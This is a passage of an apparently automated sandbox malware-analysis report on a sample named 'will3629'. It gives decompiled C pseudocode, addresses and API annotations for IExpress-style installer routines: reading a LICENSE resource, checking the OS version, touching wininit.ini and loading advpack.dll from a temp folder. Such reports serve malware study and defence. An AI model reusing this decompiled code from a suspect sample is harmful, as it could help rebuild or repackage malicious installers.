                                                • RegCloseKey.ADVAPI32(?), ref: 00AC6902
                                                  • Part of subcall function 00AC66F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,00AC691A), ref: 00AC6741
                                                Strings
                                                • Control Panel\Desktop\ResourceLocale, xrefs: 00AC68C2
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                • String ID: Control Panel\Desktop\ResourceLocale
                                                • API String ID: 3346862599-1109908249
                                                • Opcode ID: 15ee05a6cafd1461cb9e2c14b74a39f22679d3a2d143f9efef7a7b80d324b75d
                                                • Instruction ID: 9d664d49bd547c5bec7e1aece225848cbc2ce28d373da90791189ef392374748
                                                • Opcode Fuzzy Hash: 15ee05a6cafd1461cb9e2c14b74a39f22679d3a2d143f9efef7a7b80d324b75d
                                                • Instruction Fuzzy Hash: 92317331A00228DFDB31CB55CC45FAAB7B8FB45768F0601A9E94DA6240DB349E86CF52
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00AC3A3F(void* __eflags) {
                                                				void* _t3;
                                                				void* _t9;
                                                				CHAR* _t16;
                                                
                                                				_t16 = "LICENSE";
                                                				_t1 = E00AC468F(_t16, 0, 0) + 1; // 0x1
                                                				_t3 = LocalAlloc(0x40, _t1);
                                                				 *0xac8d4c = _t3;
                                                				if(_t3 != 0) {
                                                					_t19 = _t16;
                                                					if(E00AC468F(_t16, _t3, _t28) != 0) {
                                                						if(lstrcmpA( *0xac8d4c, "<None>") == 0) {
                                                							LocalFree( *0xac8d4c);
                                                							L9:
                                                							 *0xac9124 = 0;
                                                							return 1;
                                                						}
                                                						_t9 = E00AC6517(_t19, 0x7d1, 0, E00AC3100, 0, 0);
                                                						LocalFree( *0xac8d4c);
                                                						if(_t9 != 0) {
                                                							goto L9;
                                                						}
                                                						 *0xac9124 = 0x800704c7;
                                                						L2:
                                                						return 0;
                                                					}
                                                					E00AC44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                					LocalFree( *0xac8d4c);
                                                					 *0xac9124 = 0x80070714;
                                                					goto L2;
                                                				}
                                                				E00AC44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                				 *0xac9124 = E00AC6285();
                                                				goto L2;
                                                			}






                                                0x00ac3a46
                                                0x00ac3a57
                                                0x00ac3a5d
                                                0x00ac3a63
                                                0x00ac3a6a
                                                0x00ac3a91
                                                0x00ac3a9a
                                                0x00ac3ad8
                                                0x00ac3b13
                                                0x00ac3b19
                                                0x00ac3b1b
                                                0x00000000
                                                0x00ac3b21
                                                0x00ac3ae7
                                                0x00ac3af4
                                                0x00ac3afc
                                                0x00000000
                                                0x00000000
                                                0x00ac3afe
                                                0x00ac3a87
                                                0x00000000
                                                0x00ac3a87
                                                0x00ac3aa8
                                                0x00ac3ab3
                                                0x00ac3ab9
                                                0x00000000
                                                0x00ac3ab9
                                                0x00ac3a78
                                                0x00ac3a82
                                                0x00000000

                                                APIs
                                                  • Part of subcall function 00AC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00AC46A0
                                                  • Part of subcall function 00AC468F: SizeofResource.KERNEL32(00000000,00000000,?,00AC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46A9
                                                  • Part of subcall function 00AC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00AC46C3
                                                  • Part of subcall function 00AC468F: LoadResource.KERNEL32(00000000,00000000,?,00AC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46CC
                                                  • Part of subcall function 00AC468F: LockResource.KERNEL32(00000000,?,00AC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46D3
                                                  • Part of subcall function 00AC468F: memcpy_s.MSVCRT ref: 00AC46E5
                                                  • Part of subcall function 00AC468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46EF
                                                • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00AC2F64,?,00000002,00000000), ref: 00AC3A5D
                                                • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00AC3AB3
                                                  • Part of subcall function 00AC44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00AC4518
                                                  • Part of subcall function 00AC44B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 00AC4554
                                                  • Part of subcall function 00AC6285: GetLastError.KERNEL32(00AC5BBC), ref: 00AC6285
                                                • lstrcmpA.KERNEL32(<None>,00000000), ref: 00AC3AD0
                                                • LocalFree.KERNEL32 ref: 00AC3B13
                                                  • Part of subcall function 00AC6517: FindResourceA.KERNEL32(00AC0000,000007D6,00000005), ref: 00AC652A
                                                  • Part of subcall function 00AC6517: LoadResource.KERNEL32(00AC0000,00000000,?,?,00AC2EE8,00000000,00AC19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00AC6538
                                                  • Part of subcall function 00AC6517: DialogBoxIndirectParamA.USER32(00AC0000,00000000,00000547,00AC19E0,00000000), ref: 00AC6557
                                                  • Part of subcall function 00AC6517: FreeResource.KERNEL32(00000000,?,?,00AC2EE8,00000000,00AC19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00AC6560
                                                • LocalFree.KERNEL32(00000000,00AC3100,00000000,00000000), ref: 00AC3AF4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                • String ID: <None>$LICENSE
                                                • API String ID: 2414642746-383193767
                                                • Opcode ID: 32f492f5f2ced65c419fdc2d94392c1668d0bc8107368cb3dc0c06fc2dc74ec9
                                                • Instruction ID: 23547676db1dcb82261528a1d48553229376a1d928e1def5ec6de90b06ae0659
                                                • Opcode Fuzzy Hash: 32f492f5f2ced65c419fdc2d94392c1668d0bc8107368cb3dc0c06fc2dc74ec9
                                                • Instruction Fuzzy Hash: F611DA723002016BDB25DFB2AD09F2739F9EBD9B40B17852EB542D51A1DF7E8C128725
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 94%
                                                			E00AC24E0(void* __ebx) {
                                                				signed int _v8;
                                                				char _v268;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t7;
                                                				void* _t20;
                                                				long _t26;
                                                				signed int _t27;
                                                
                                                				_t20 = __ebx;
                                                				_t7 =  *0xac8004; // 0xc32e3ded
                                                				_v8 = _t7 ^ _t27;
                                                				_t25 = 0x104;
                                                				_t26 = 0;
                                                				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                					E00AC658A( &_v268, 0x104, "wininit.ini");
                                                					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                					_t25 = _lopen( &_v268, 0x40);
                                                					if(_t25 != 0xffffffff) {
                                                						_t26 = _llseek(_t25, 0, 2);
                                                						_lclose(_t25);
                                                					}
                                                				}
                                                				return E00AC6CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                			}











                                                0x00ac24e0
                                                0x00ac24eb
                                                0x00ac24f2
                                                0x00ac24f7
                                                0x00ac2504
                                                0x00ac250e
                                                0x00ac251d
                                                0x00ac252c
                                                0x00ac2541
                                                0x00ac2546
                                                0x00ac2553
                                                0x00ac2555
                                                0x00ac2555
                                                0x00ac2546
                                                0x00ac256c

                                                APIs
                                                • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00AC2506
                                                • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 00AC252C
                                                • _lopen.KERNEL32(?,00000040), ref: 00AC253B
                                                • _llseek.KERNEL32(00000000,00000000,00000002), ref: 00AC254C
                                                • _lclose.KERNEL32(00000000), ref: 00AC2555
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                • String ID: wininit.ini
                                                • API String ID: 3273605193-4206010578
                                                • Opcode ID: 2b4bb8c2a536db95d6f8a455554e81294ac8fb96d2fc2225ed8195f68577f1ea
                                                • Instruction ID: 5e4c2fb3b6782bf1d7a15ea11c47e60bac4e4400c1cff8d772422e89ba0ac080
                                                • Opcode Fuzzy Hash: 2b4bb8c2a536db95d6f8a455554e81294ac8fb96d2fc2225ed8195f68577f1ea
                                                • Instruction Fuzzy Hash: 5C019236A0011C67C720DBA59C08EEBBBBCEB55794F020169FA49D3190DA748E468A91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 75%
                                                			E00AC36EE(CHAR* __ecx) {
                                                				signed int _v8;
                                                				char _v268;
                                                				struct _OSVERSIONINFOA _v416;
                                                				signed int _v420;
                                                				signed int _v424;
                                                				CHAR* _v428;
                                                				CHAR* _v432;
                                                				signed int _v436;
                                                				CHAR* _v440;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t72;
                                                				CHAR* _t77;
                                                				CHAR* _t91;
                                                				CHAR* _t94;
                                                				int _t97;
                                                				CHAR* _t98;
                                                				signed char _t99;
                                                				CHAR* _t104;
                                                				signed short _t107;
                                                				signed int _t109;
                                                				short _t113;
                                                				void* _t114;
                                                				signed char _t115;
                                                				short _t119;
                                                				CHAR* _t123;
                                                				CHAR* _t124;
                                                				CHAR* _t129;
                                                				signed int _t131;
                                                				signed int _t132;
                                                				CHAR* _t135;
                                                				CHAR* _t138;
                                                				signed int _t139;
                                                
                                                				_t72 =  *0xac8004; // 0xc32e3ded
                                                				_v8 = _t72 ^ _t139;
                                                				_v416.dwOSVersionInfoSize = 0x94;
                                                				_t115 = __ecx;
                                                				_t135 = 0;
                                                				_v432 = __ecx;
                                                				_t138 = 0;
                                                				if(GetVersionExA( &_v416) != 0) {
                                                					_t133 = _v416.dwMajorVersion;
                                                					_t119 = 2;
                                                					_t77 = _v416.dwPlatformId - 1;
                                                					__eflags = _t77;
                                                					if(_t77 == 0) {
                                                						_t119 = 0;
                                                						__eflags = 1;
                                                						 *0xac8184 = 1;
                                                						 *0xac8180 = 1;
                                                						L13:
                                                						 *0xac9a40 = _t119;
                                                						L14:
                                                						__eflags =  *0xac8a34 - _t138; // 0x0
                                                						if(__eflags != 0) {
                                                							goto L66;
                                                						}
                                                						__eflags = _t115;
                                                						if(_t115 == 0) {
                                                							goto L66;
                                                						}
                                                						_v428 = _t135;
                                                						__eflags = _t119;
                                                						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                						_t11 =  &_v420;
                                                						 *_t11 = _v420 & _t138;
                                                						__eflags =  *_t11;
                                                						_v440 = _t115;
                                                						do {
                                                							_v424 = _t135 * 0x18;
                                                							_v436 = E00AC2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                							_t91 = E00AC2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                							_t123 = _v436;
                                                							_t133 = 0x54d;
                                                							__eflags = _t123;
                                                							if(_t123 < 0) {
                                                								L32:
                                                								__eflags = _v420 - 1;
                                                								if(_v420 == 1) {
                                                									_t138 = 0x54c;
                                                									L36:
                                                									__eflags = _t138;
                                                									if(_t138 != 0) {
                                                										L40:
                                                										__eflags = _t138 - _t133;
                                                										if(_t138 == _t133) {
                                                											L30:
                                                											_v420 = _v420 & 0x00000000;
                                                											_t115 = 0;
                                                											_v436 = _v436 & 0x00000000;
                                                											__eflags = _t138 - _t133;
                                                											_t133 = _v432;
                                                											if(__eflags != 0) {
                                                												_t124 = _v440;
                                                											} else {
                                                												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                												_v420 =  &_v268;
                                                											}
                                                											__eflags = _t124;
                                                											if(_t124 == 0) {
                                                												_t135 = _v436;
                                                											} else {
                                                												_t99 = _t124[0x30];
                                                												_t135 = _t124[0x34] + 0x84 + _t133;
                                                												__eflags = _t99 & 0x00000001;
                                                												if((_t99 & 0x00000001) == 0) {
                                                													asm("sbb ebx, ebx");
                                                													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                												} else {
                                                													_t115 = 0x104;
                                                												}
                                                											}
                                                											__eflags =  *0xac8a38 & 0x00000001;
                                                											if(( *0xac8a38 & 0x00000001) != 0) {
                                                												L64:
                                                												_push(0);
                                                												_push(0x30);
                                                												_push(_v420);
                                                												_push("lega");
                                                												goto L65;
                                                											} else {
                                                												__eflags = _t135;
                                                												if(_t135 == 0) {
                                                													goto L64;
                                                												}
                                                												__eflags =  *_t135;
                                                												if( *_t135 == 0) {
                                                													goto L64;
                                                												}
                                                												MessageBeep(0);
                                                												_t94 = E00AC681F(_t115);
                                                												__eflags = _t94;
                                                												if(_t94 == 0) {
                                                													L57:
                                                													0x180030 = 0x30;
                                                													L58:
                                                													_t97 = MessageBoxA(0, _t135, "lega", 0x00180030 | _t115);
                                                													__eflags = _t115 & 0x00000004;
                                                													if((_t115 & 0x00000004) == 0) {
                                                														__eflags = _t115 & 0x00000001;
                                                														if((_t115 & 0x00000001) == 0) {
                                                															goto L66;
                                                														}
                                                														__eflags = _t97 - 1;
                                                														L62:
                                                														if(__eflags == 0) {
                                                															_t138 = 0;
                                                														}
                                                														goto L66;
                                                													}
                                                													__eflags = _t97 - 6;
                                                													goto L62;
                                                												}
                                                												_t98 = E00AC67C9(_t124, _t124);
                                                												__eflags = _t98;
                                                												if(_t98 == 0) {
                                                													goto L57;
                                                												}
                                                												goto L58;
                                                											}
                                                										}
                                                										__eflags = _t138 - 0x54c;
                                                										if(_t138 == 0x54c) {
                                                											goto L30;
                                                										}
                                                										__eflags = _t138;
                                                										if(_t138 == 0) {
                                                											goto L66;
                                                										}
                                                										_t135 = 0;
                                                										__eflags = 0;
                                                										goto L44;
                                                									}
                                                									L37:
                                                									_t129 = _v432;
                                                									__eflags = _t129[0x7c];
                                                									if(_t129[0x7c] == 0) {
                                                										goto L66;
                                                									}
                                                									_t133 =  &_v268;
                                                									_t104 = E00AC28E8(_t129,  &_v268, _t129,  &_v428);
                                                									__eflags = _t104;
                                                									if(_t104 != 0) {
                                                										goto L66;
                                                									}
                                                									_t135 = _v428;
                                                									_t133 = 0x54d;
                                                									_t138 = 0x54d;
                                                									goto L40;
                                                								}
                                                								goto L33;
                                                							}
                                                							__eflags = _t91;
                                                							if(_t91 > 0) {
                                                								goto L32;
                                                							}
                                                							__eflags = _t123;
                                                							if(_t123 != 0) {
                                                								__eflags = _t91;
                                                								if(_t91 != 0) {
                                                									goto L37;
                                                								}
                                                								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                								L27:
                                                								if(__eflags <= 0) {
                                                									goto L37;
                                                								}
                                                								L28:
                                                								__eflags = _t135;
                                                								if(_t135 == 0) {
                                                									goto L33;
                                                								}
                                                								_t138 = 0x54c;
                                                								goto L30;
                                                							}
                                                							__eflags = _t91;
                                                							_t107 = _v416.dwBuildNumber;
                                                							if(_t91 != 0) {
                                                								_t131 = _v424;
                                                								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                									goto L37;
                                                								}
                                                								goto L28;
                                                							}
                                                							_t132 = _t107 & 0x0000ffff;
                                                							_t109 = _v424;
                                                							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                								goto L28;
                                                							}
                                                							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                							goto L27;
                                                							L33:
                                                							_t135 =  &(_t135[1]);
                                                							_v428 = _t135;
                                                							_v420 = _t135;
                                                							__eflags = _t135 - 2;
                                                						} while (_t135 < 2);
                                                						goto L36;
                                                					}
                                                					__eflags = _t77 == 1;
                                                					if(_t77 == 1) {
                                                						 *0xac9a40 = _t119;
                                                						 *0xac8184 = 1;
                                                						 *0xac8180 = 1;
                                                						__eflags = _t133 - 3;
                                                						if(_t133 > 3) {
                                                							__eflags = _t133 - 5;
                                                							if(_t133 < 5) {
                                                								goto L14;
                                                							}
                                                							_t113 = 3;
                                                							_t119 = _t113;
                                                							goto L13;
                                                						}
                                                						_t119 = 1;
                                                						_t114 = 3;
                                                						 *0xac9a40 = 1;
                                                						__eflags = _t133 - _t114;
                                                						if(__eflags < 0) {
                                                							L9:
                                                							 *0xac8184 = _t135;
                                                							 *0xac8180 = _t135;
                                                							goto L14;
                                                						}
                                                						if(__eflags != 0) {
                                                							goto L14;
                                                						}
                                                						__eflags = _v416.dwMinorVersion - 0x33;
                                                						if(_v416.dwMinorVersion >= 0x33) {
                                                							goto L14;
                                                						}
                                                						goto L9;
                                                					}
                                                					_t138 = 0x4ca;
                                                					goto L44;
                                                				} else {
                                                					_t138 = 0x4b4;
                                                					L44:
                                                					_push(_t135);
                                                					_push(0x10);
                                                					_push(_t135);
                                                					_push(_t135);
                                                					L65:
                                                					_t133 = _t138;
                                                					E00AC44B9(0, _t138);
                                                					L66:
                                                					return E00AC6CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                				}
                                                			}





































                                                0x00ac36f9
                                                0x00ac3700
                                                0x00ac370c
                                                0x00ac3716
                                                0x00ac3718
                                                0x00ac371b
                                                0x00ac3721
                                                0x00ac372b
                                                0x00ac373d
                                                0x00ac3745
                                                0x00ac3746
                                                0x00ac3746
                                                0x00ac3749
                                                0x00ac37ab
                                                0x00ac37ad
                                                0x00ac37ae
                                                0x00ac37b3
                                                0x00ac37b8
                                                0x00ac37b8
                                                0x00ac37bf
                                                0x00ac37bf
                                                0x00ac37c5
                                                0x00000000
                                                0x00000000
                                                0x00ac37cb
                                                0x00ac37cd
                                                0x00000000
                                                0x00000000
                                                0x00ac37d5
                                                0x00ac37db
                                                0x00ac37e8
                                                0x00ac37ea
                                                0x00ac37ea
                                                0x00ac37ea
                                                0x00ac37f0
                                                0x00ac37f6
                                                0x00ac3805
                                                0x00ac3817
                                                0x00ac382b
                                                0x00ac3830
                                                0x00ac3836
                                                0x00ac383b
                                                0x00ac383d
                                                0x00ac38eb
                                                0x00ac38eb
                                                0x00ac38f2
                                                0x00ac390c
                                                0x00ac3911
                                                0x00ac3911
                                                0x00ac3913
                                                0x00ac394d
                                                0x00ac394d
                                                0x00ac394f
                                                0x00ac38a9
                                                0x00ac38a9
                                                0x00ac38b0
                                                0x00ac38b2
                                                0x00ac38b9
                                                0x00ac38bb
                                                0x00ac38c1
                                                0x00ac3975
                                                0x00ac38c7
                                                0x00ac38de
                                                0x00ac38e0
                                                0x00ac38e0
                                                0x00ac397b
                                                0x00ac397d
                                                0x00ac39a9
                                                0x00ac397f
                                                0x00ac3982
                                                0x00ac398b
                                                0x00ac398d
                                                0x00ac398f
                                                0x00ac399f
                                                0x00ac39a1
                                                0x00ac3991
                                                0x00ac3991
                                                0x00ac3991
                                                0x00ac398f
                                                0x00ac39af
                                                0x00ac39b6
                                                0x00ac3a0f
                                                0x00ac3a0f
                                                0x00ac3a11
                                                0x00ac3a13
                                                0x00ac3a19
                                                0x00000000
                                                0x00ac39b8
                                                0x00ac39b8
                                                0x00ac39ba
                                                0x00000000
                                                0x00000000
                                                0x00ac39bc
                                                0x00ac39bf
                                                0x00000000
                                                0x00000000
                                                0x00ac39c3
                                                0x00ac39c9
                                                0x00ac39ce
                                                0x00ac39d0
                                                0x00ac39e3
                                                0x00ac39e5
                                                0x00ac39e6
                                                0x00ac39f1
                                                0x00ac39f7
                                                0x00ac39fa
                                                0x00ac3a01
                                                0x00ac3a04
                                                0x00000000
                                                0x00000000
                                                0x00ac3a06
                                                0x00ac3a09
                                                0x00ac3a09
                                                0x00ac3a0b
                                                0x00ac3a0b
                                                0x00000000
                                                0x00ac3a09
                                                0x00ac39fc
                                                0x00000000
                                                0x00ac39fc
                                                0x00ac39d3
                                                0x00ac39d8
                                                0x00ac39da
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00ac39dc
                                                0x00ac39b6
                                                0x00ac3955
                                                0x00ac395b
                                                0x00000000
                                                0x00000000
                                                0x00ac3961
                                                0x00ac3963
                                                0x00000000
                                                0x00000000
                                                0x00ac3969
                                                0x00ac3969
                                                0x00000000
                                                0x00ac3969
                                                0x00ac3915
                                                0x00ac3915
                                                0x00ac391b
                                                0x00ac391f
                                                0x00000000
                                                0x00000000
                                                0x00ac392d
                                                0x00ac3933
                                                0x00ac3938
                                                0x00ac393a
                                                0x00000000
                                                0x00000000
                                                0x00ac3940
                                                0x00ac3946
                                                0x00ac394b
                                                0x00000000
                                                0x00ac394b
                                                0x00000000
                                                0x00ac38f2
                                                0x00ac3843
                                                0x00ac3845
                                                0x00000000
                                                0x00000000
                                                0x00ac384b
                                                0x00ac384d
                                                0x00ac3883
                                                0x00ac3885
                                                0x00000000
                                                0x00000000
                                                0x00ac389a
                                                0x00ac389e
                                                0x00ac389e
                                                0x00000000
                                                0x00000000
                                                0x00ac38a0
                                                0x00ac38a0
                                                0x00ac38a2
                                                0x00000000
                                                0x00000000
                                                0x00ac38a4
                                                0x00000000
                                                0x00ac38a4
                                                0x00ac384f
                                                0x00ac3851
                                                0x00ac3857
                                                0x00ac386e
                                                0x00ac3877
                                                0x00ac387b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00ac3881
                                                0x00ac3859
                                                0x00ac385c
                                                0x00ac3862
                                                0x00ac3866
                                                0x00000000
                                                0x00000000
                                                0x00ac3868
                                                0x00000000
                                                0x00ac38f4
                                                0x00ac38f4
                                                0x00ac38f5
                                                0x00ac38fb
                                                0x00ac3901
                                                0x00ac3901
                                                0x00000000
                                                0x00ac390a
                                                0x00ac374b
                                                0x00ac374e
                                                0x00ac375c
                                                0x00ac3764
                                                0x00ac3769
                                                0x00ac376e
                                                0x00ac3771
                                                0x00ac379c
                                                0x00ac379f
                                                0x00000000
                                                0x00000000
                                                0x00ac37a3
                                                0x00ac37a4
                                                0x00000000
                                                0x00ac37a4
                                                0x00ac3773
                                                0x00ac3777
                                                0x00ac3778
                                                0x00ac377f
                                                0x00ac3781
                                                0x00ac378e
                                                0x00ac378e
                                                0x00ac3794
                                                0x00000000
                                                0x00ac3794
                                                0x00ac3783
                                                0x00000000
                                                0x00000000
                                                0x00ac3785
                                                0x00ac378c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00ac378c
                                                0x00ac3750
                                                0x00000000
                                                0x00ac372d
                                                0x00ac372d
                                                0x00ac396b
                                                0x00ac396b
                                                0x00ac396c
                                                0x00ac396e
                                                0x00ac396f
                                                0x00ac3a1e
                                                0x00ac3a1e
                                                0x00ac3a22
                                                0x00ac3a27
                                                0x00ac3a3e
                                                0x00ac3a3e

                                                APIs
                                                • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00AC3723
                                                • MessageBeep.USER32(00000000), ref: 00AC39C3
                                                • MessageBoxA.USER32(00000000,00000000,lega,00000030), ref: 00AC39F1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: Message$BeepVersion
                                                • String ID: 3$lega
                                                • API String ID: 2519184315-680046778
                                                • Opcode ID: 3f0fc5f5afd1e3b43d2c5da68ea6b12b2480d2f22493ffe8bc8a86bda3d59c25
                                                • Instruction ID: 8e56e0684cf50c931eef83bcfc2ab7d01c3ba5d598697c73ba06a5733e65d0f8
                                                • Opcode Fuzzy Hash: 3f0fc5f5afd1e3b43d2c5da68ea6b12b2480d2f22493ffe8bc8a86bda3d59c25
                                                • Instruction Fuzzy Hash: 7691F372A012249FDF34CB25CD91FAAB3B0BB45344F1781ADD84AAB241DB718F81CB41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 83%
                                                			E00AC6495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                				signed int _v8;
                                                				char _v268;
                                                				void* __edi;
                                                				signed int _t9;
                                                				signed char _t14;
                                                				struct HINSTANCE__* _t15;
                                                				void* _t18;
                                                				CHAR* _t26;
                                                				void* _t27;
                                                				signed int _t28;
                                                
                                                				_t27 = __esi;
                                                				_t18 = __ebx;
                                                				_t9 =  *0xac8004; // 0xc32e3ded
                                                				_v8 = _t9 ^ _t28;
                                                				_push(__ecx);
                                                				E00AC1781( &_v268, 0x104, __ecx, "C:\Users\alfons\AppData\Local\Temp\IXP002.TMP\");
                                                				_t26 = "advpack.dll";
                                                				E00AC658A( &_v268, 0x104, _t26);
                                                				_t14 = GetFileAttributesA( &_v268);
                                                				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                					_t15 = LoadLibraryA(_t26);
                                                				} else {
                                                					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                				}
                                                				return E00AC6CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                			}













                                                0x00ac6495
                                                0x00ac6495
                                                0x00ac64a0
                                                0x00ac64a7
                                                0x00ac64ab
                                                0x00ac64bd
                                                0x00ac64c2
                                                0x00ac64d3
                                                0x00ac64df
                                                0x00ac64e8
                                                0x00ac6502
                                                0x00ac64ee
                                                0x00ac64f9
                                                0x00ac64f9
                                                0x00ac6516

                                                APIs
                                                • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 00AC64DF
                                                • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 00AC64F9
                                                • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 00AC6502
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: LibraryLoad$AttributesFile
                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$advpack.dll
                                                • API String ID: 438848745-2284591408
